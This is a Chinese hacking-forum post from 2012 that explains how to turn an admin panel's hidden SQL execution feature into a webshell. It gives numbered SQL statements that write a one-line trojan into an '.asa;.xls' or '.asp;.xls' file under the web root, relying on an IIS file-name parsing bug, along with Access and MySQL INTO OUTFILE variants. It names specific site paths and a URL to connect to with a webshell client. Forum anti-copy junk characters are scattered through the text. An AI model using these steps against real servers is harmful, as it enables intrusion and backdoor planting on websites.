好不容易进了后台,发现啥上传啊。备份啊多木有。
]& E' o# w. J( z3 @6 g( W- ]1 }4 owebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ b4 R% }5 ?; r! U* _- k+ e文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,' [+ v1 j: U' \) L5 k; k
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
0 h2 |) v7 e8 w. W6 }- C1.create table cmd (a varchar(50))1 p& P: J8 L& D$ k5 S* I& t
2.insert into cmd (a) values (‘‘)
+ o1 k9 q9 O2 o: g/ ?3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd4 M7 ?5 Z$ o9 k2 [1 j) E
(把表cmd的内容导出为物理路径的一个EXCEL文件)
4 N& \2 p7 p4 f' |2 E6 `4.drop table cmd
2 k$ M# c" b) d6 n- f* s% k$ s( v利用IIS的BUG成功拿到了WEBSHELL。) k5 g$ O/ N% k8 \/ P: d* L! Z
1 i2 |, i% ^( d* L) V
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话& `2 O* O; S" r6 L4 w
5 h+ Y8 {6 n; u# |' ?7 P SQL语句意思解释:8 P+ ^( y2 t8 `. j t* t
第一句
- Y* v3 o) c8 n8 o8 S- M& o 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50# X9 T$ @ b3 r$ V9 ~+ L8 w0 g" J; c
5 g( p( E5 n5 b; G3 N; e 第二句
8 C/ a, U4 e& K; o5 q 在表cmd的a字段插入一句话木马+ V# @7 `9 V; s* Z
第三句! P- v7 J- D, Y' ]
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
# `; V! L) d: \2 ^
) m4 g6 i# n* u' `) X 第四句* B5 B$ }# g( @( y) ^1 v
删除建立的cmd表
. p6 L: K2 R2 d, h, E9 h* h) j- c3 `) R! G8 R+ Q. P+ w
以下内容为测试:
& {! D3 Q' ^1 G3 \ Access利用后台SQL执行命令功能导出WebShell:, S/ q" \1 ^/ `3 A3 i1 Z
这个更简单:# U8 e5 J- |/ l# ^' S; k
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]' i- T- F$ F: W
或者
. O. `" C& c% {* E: Q7 B [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]: f) G- O- J L1 X6 X
, o# @8 x) o- F8 R' Z& x! c" x8 o
后台有执行SQL语句功能(vote为已知表段)
2 g+ M6 m( \' }$ t7 _- J! Q 希望对大家有所帮助拿shell的又一个思路* O2 \; u, y6 s, L
|
发表于 2012-9-13 17:53:58
收藏
支持
反对